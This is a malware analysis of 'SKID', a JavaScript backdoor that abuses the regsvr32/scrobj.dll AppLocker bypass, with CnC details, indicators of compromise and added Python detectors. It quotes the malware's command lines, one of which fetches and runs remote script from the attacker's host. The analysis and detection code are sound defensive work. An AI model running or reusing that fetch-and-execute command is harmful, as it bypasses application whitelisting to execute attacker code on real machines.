
While analyzing a customer endpoint, we identified a new threat that exploits a recent Microsoft Windows technique, discovered in April 2016 and called "AppLocker Bypass".
We named this threat "SKID" because the code contains many keywords with that name.
Indicators of Compromise for detecting compromised endpoints are provided at the end of this post.
APPLOCKER BYPASS – EXPLOITING TECHNIQUES
The new threat, identified as "SKID", uses a recent Windows technique called "AppLocker Bypass"; with this technique it is possible to execute VBScript or JScript code through the system process regsvr32.exe, which loads scrobj.dll to run the script.
This technique, discovered in April 2016, is documented in detail at the following links:
http://www.subt0x10.blogspot.it/2016/04/bypass-application-whitelisting-script.html
http://betanews.com/2016/04/25/bypass-applocker-security/
We tracked this process, which was abused to execute a JavaScript file located in the victim user's profile folder.
SKID is launched with the following command line:
regsvr32.exe /s /n /u /i:"C:\Users\[username]\AppData\Roaming\9DB0F2C13D.txt" scrobj.dll
FIRST STAGE – JAVASCRIPT DOWNLOADER
The analyzed file has the following details:
File name: 9DB0F2C13D.txt
File path: C:\Users\[username]\AppData\Roaming\
File size: 14646 Bytes
MD5: 28DD8E548FAE06C9114D1593150F3860
From the first lines of the file it is possible to see that it is a JavaScript script, but the code is obfuscated.
After de-obfuscating the code, we found the following:
- A function checks Internet connectivity by making an HTTP request to the host update.microsoft.com
- The backdoor makes an HTTP GET request to the host 8.8.8.8
- It reads the registry key HKEY_CURRENT_USER\Software\Microsoft\Notepad\<username>, in which we found references to the installed backdoor
- It checks whether the threat is already installed by querying WMI for a running regsvr32 process
- The script downloads the actual backdoor JavaScript from the address hxxps://webmail.xcloud.kz/js/changelog.txt into the user folder C:\Users\<username>\AppData\<filename>.txt and runs it on the system with the "AppLocker Bypass" technique, using the following command: C:\windows\system32\regsvr32.exe /s/n/u/i:https://webmail.xcloud.kz/js/changelog.txt scrobj.dll
This first file is therefore a downloader, built specifically to use the technique described above.
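The two command lines quoted above are the behavioural fingerprint of the technique: regsvr32.exe given scrobj.dll as the DLL and an /i: install argument, with the argument pointing either at a local file with a non-.sct extension or at a URL. The following Python detector is an added example, not code from the original write-up: it parses process-creation command lines (the kind exported from Sysmon Event ID 1 or Security event 4688), handles both the spaced (/s /n /u /i:) and fused (/s/n/u/i:) flag forms seen in the two samples, and classifies the hit. The events, hostnames and usernames are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Constructed process-creation events (fields a Sysmon EID 1 / Security 4688 export
# would carry). Made up for this example, modelled on the two command lines in the
# write-up; hosts and usernames are invented.
SAMPLE_EVENTS = [
    {"host": "WS01",
     "cmdline": r'regsvr32.exe /s /n /u /i:"C:\Users\jdoe\AppData\Roaming\9DB0F2C13D.txt" scrobj.dll'},
    {"host": "WS01",
     "cmdline": r'"C:\windows\system32\regsvr32.exe" /s/n/u/i:https://webmail.xcloud.kz/js/changelog.txt scrobj.dll'},
    # Ordinary COM registration of a vendor DLL: must not fire.
    {"host": "WS02", "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"host": "WS03", "cmdline": r'cmd.exe /c echo hello'},
]


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, honouring double quotes
    (no backslash escaping, which is the common case for regsvr32 invocations)."""
    args, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_regsvr32(args: List[str]) -> Tuple[Set[str], Optional[str], Optional[str]]:
    """Return (flags, install_arg, dll) for a regsvr32 command line.

    Flags may be separated (/s /n /u /i:x) or fused (/s/n/u/i:x); /i swallows the
    rest of its token because the install argument may itself contain '/' (a URL).
    """
    flags: Set[str] = set()
    install_arg = dll = None
    for tok in args[1:]:
        if tok[:1] in ("/", "-"):
            rest = tok
            while rest[:1] in ("/", "-"):
                letter = rest[1:2].lower()
                if letter == "i":
                    flags.add("i")
                    if rest[2:3] == ":":
                        install_arg = rest[3:]
                    break
                flags.add(letter)
                rest = rest[2:]
        else:
            dll = tok
    return flags, install_arg, dll


@dataclass
class Finding:
    host: str
    reason: str
    install_arg: Optional[str]


def detect_scrobj_bypass(event: dict) -> Optional[Finding]:
    """Flag regsvr32 loading scrobj.dll with an /i: install argument, i.e. the
    DllInstall path that scrobj.dll uses to fetch and run a scriptlet."""
    args = split_cmdline(event["cmdline"])
    if not args or not args[0].lower().endswith("regsvr32.exe"):
        return None
    flags, install_arg, dll = parse_regsvr32(args)
    if dll is None or dll.lower().rsplit("\\", 1)[-1] != "scrobj.dll":
        return None
    if "i" not in flags:
        return None
    if install_arg and re.match(r"https?://", install_arg, re.IGNORECASE):
        reason = "regsvr32 + scrobj.dll fetching a remote scriptlet"
    elif install_arg and not install_arg.lower().endswith(".sct"):
        reason = "regsvr32 + scrobj.dll running a local scriptlet with a disguised extension"
    else:
        reason = "regsvr32 + scrobj.dll with /i: install argument"
    return Finding(event["host"], reason, install_arg)


def scan(events) -> List[Finding]:
    """Run the detector over a batch of events and keep only the hits."""
    return [f for f in map(detect_scrobj_bypass, events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.reason} -> {f.install_arg}")
```

Matching on scrobj.dll plus /i: rather than on the .txt extension or the exact path keeps the rule valid when the attacker renames the scriptlet or serves it from a different URL; the extension and URL checks only refine the severity.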
SECOND STAGE – JAVASCRIPT BACKDOOR
The second file analyzed has the following details; it is a full backdoor written in JavaScript, currently at version 2.0:
File name: changelog.txt
Downloaded from: hxxps://webmail.xcloud.kz/js/changelog.txt
File size: 43686 Bytes
MD5: 09BCF50D498C67942A4F70FDD72D2913
Its header is very similar to that of the first file.
This JavaScript file is also obfuscated; the code was de-obfuscated in order to analyze the malware's characteristics.
The backdoor is able to collect the following information:
- Operating system and architecture (32 or 64 bit)
- Whether one of the following antivirus products is installed or running on the system:
- Windows Defender
- McAfee
- Avast
- Avira
- AVG
- TrendMicro
- Panda
- F-Secure
- Kaspersky
- Symantec
- Sophos
- Bitdefender
- ESET
- Comodo
- Malwarebytes
- Norton
- ClamAV
- Trusteer Rapport
- DeepFreeze
- 360 Total Security
- Seqrite EndPoint Security
- Quick Heal
- Fortinet
- Bitdefender Endpoint Security
- ByteFence
- G-Data
- Webroot
- Computer serial number
- Local computer IP
- Installed backdoor version (v2.0 at the time of analysis)
Through this backdoor the attacker can perform the following tasks:
- Download and execute binary files (.exe and .dll)
- Download and run .js or .vbs scripts using the "AppLocker Bypass" technique
- Remove the threat from the victim PC
- Execute commands remotely on the victim PC
CnC – DOMAIN ANALYSIS
The CnC identified is the following:
Hostname: webmail.xcloud.kz
IP: 82.211.34.91
The domain xcloud.kz was registered on 15 November 2016, and the SSL certificate of the host webmail.xcloud.kz is valid from 15 November 2016 to 16 November 2017.
From this evidence it is reasonable to assume that the attacker built and distributed the first versions of the backdoor at the end of 2016.
INDICATORS OF COMPROMISE
The IoCs useful for investigating and verifying whether the threat is present on other endpoints are the following:
– MD5
28DD8E548FAE06C9114D1593150F3860
09BCF50D498C67942A4F70FDD72D2913
– NETWORK ACTIVITY
CnC IP: 82.211.34.91
CnC hostname: webmail.xcloud.kz
CnC URL: hxxps://webmail.xcloud.kz/js/ajax.php
Anomalous behavior: outbound connections to 8.8.8.8 (a Google IP) on port 80, HTTP protocol
– REGISTRY KEYS
HKEY_CURRENT_USER\Software\Microsoft\Notepad\<username>
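To sweep other endpoints for these indicators, the atomic IoCs (hashes, CnC IP, hostname, URLs) and the two behavioural ones (HTTP to 8.8.8.8 on TCP/80, and a per-user subkey under HKCU\Software\Microsoft\Notepad) need slightly different matching logic. The Python below is an added example, not code from the original write-up: it takes constructed endpoint telemetry records (file, network, DNS and registry events with invented hosts and usernames) and returns the hits per host. Note that HKCU\Software\Microsoft\Notepad itself is a legitimate key where Notepad saves its settings, so only a subkey named after the user is treated as the marker.

```python
from collections import defaultdict
from typing import Dict, List

# Indicators from the write-up, lower-cased for matching.
IOC_MD5 = {"28dd8e548fae06c9114d1593150f3860", "09bcf50d498c67942a4f70fdd72d2913"}
IOC_IP = {"82.211.34.91"}
IOC_HOST = {"webmail.xcloud.kz"}
IOC_URL = {"https://webmail.xcloud.kz/js/ajax.php",
           "https://webmail.xcloud.kz/js/changelog.txt"}
# The marker key is HKCU\Software\Microsoft\Notepad\<username>; the parent key is
# legitimate, so we require at least one extra path component below it.
NOTEPAD_PREFIX = r"hkey_current_user\software\microsoft\notepad" + "\\"

# Constructed telemetry (made up for this example; hosts and users are invented).
SAMPLE_EVENTS = [
    {"type": "file", "host": "WS01", "path": r"C:\Users\jdoe\AppData\Roaming\9DB0F2C13D.txt",
     "md5": "28DD8E548FAE06C9114D1593150F3860"},
    {"type": "net", "host": "WS01", "dst_ip": "82.211.34.91", "dst_port": 443, "proto": "tcp",
     "hostname": "webmail.xcloud.kz"},
    {"type": "net", "host": "WS01", "dst_ip": "8.8.8.8", "dst_port": 80, "proto": "tcp"},
    {"type": "net", "host": "WS02", "dst_ip": "8.8.8.8", "dst_port": 53, "proto": "udp"},  # plain DNS
    {"type": "reg", "host": "WS01", "key": r"HKCU\Software\Microsoft\Notepad\jdoe"},
    {"type": "reg", "host": "WS02", "key": r"HKEY_CURRENT_USER\Software\Microsoft\Notepad",
     "value": "lfFaceName"},  # Notepad's own settings: benign
    {"type": "dns", "host": "WS03", "query": "webmail.xcloud.kz."},
    {"type": "net", "host": "WS03", "dst_ip": "82.211.34.91", "dst_port": 443, "proto": "tcp",
     "url": "https://webmail.xcloud.kz/js/ajax.php"},
    {"type": "file", "host": "WS02", "path": r"C:\Users\asmith\AppData\Roaming\notes.txt",
     "md5": "d41d8cd98f00b204e9800998ecf8427e"},
]


def norm_key(key: str) -> str:
    """Normalise a registry path: lower case, backslashes, full hive name."""
    k = key.strip().lower().replace("/", "\\")
    if k.startswith("hkcu\\"):
        k = "hkey_current_user\\" + k[len("hkcu\\"):]
    return k


def match_event(ev: dict) -> List[str]:
    """Return the list of indicator descriptions that a single event matches."""
    hits: List[str] = []
    kind = ev["type"]
    if kind == "file":
        if ev.get("md5", "").lower() in IOC_MD5:
            hits.append(f"file {ev['path']} has known-bad MD5 {ev['md5'].lower()}")
    elif kind == "net":
        if ev.get("dst_ip") in IOC_IP:
            hits.append(f"connection to CnC IP {ev['dst_ip']}:{ev.get('dst_port')}")
        if ev.get("hostname", "").lower() in IOC_HOST:
            hits.append(f"TLS/HTTP to CnC host {ev['hostname']}")
        if ev.get("url", "").lower() in IOC_URL:
            hits.append(f"request to CnC URL {ev['url']}")
        # The downloader's connectivity check is an HTTP GET to 8.8.8.8. That address is
        # a public DNS resolver, so TCP/80 to it is unusual while UDP/53 is ordinary.
        if ev.get("dst_ip") == "8.8.8.8" and ev.get("proto") == "tcp" and ev.get("dst_port") == 80:
            hits.append("HTTP to 8.8.8.8 (downloader connectivity check)")
    elif kind == "dns":
        if ev.get("query", "").lower().rstrip(".") in IOC_HOST:
            hits.append(f"DNS lookup of CnC host {ev['query']}")
    elif kind == "reg":
        k = norm_key(ev["key"])
        if k.startswith(NOTEPAD_PREFIX) and k[len(NOTEPAD_PREFIX):]:
            hits.append(f"per-user backdoor marker key {ev['key']}")
    return hits


def sweep(events) -> Dict[str, List[str]]:
    """Group indicator hits by host; hosts with no hits are omitted."""
    report: Dict[str, List[str]] = defaultdict(list)
    for ev in events:
        for h in match_event(ev):
            report[ev["host"]].append(h)
    return dict(report)


if __name__ == "__main__":
    for host, hits in sorted(sweep(SAMPLE_EVENTS).items()):
        print(host)
        for h in hits:
            print("  -", h)
```

In practice the behavioural indicators carry the most weight: the hashes change with every rebuild of the obfuscated scripts and the CnC can move, but the regsvr32/scrobj.dll launch pattern, the 8.8.8.8 HTTP probe and the Notepad marker key are properties of how this backdoor works.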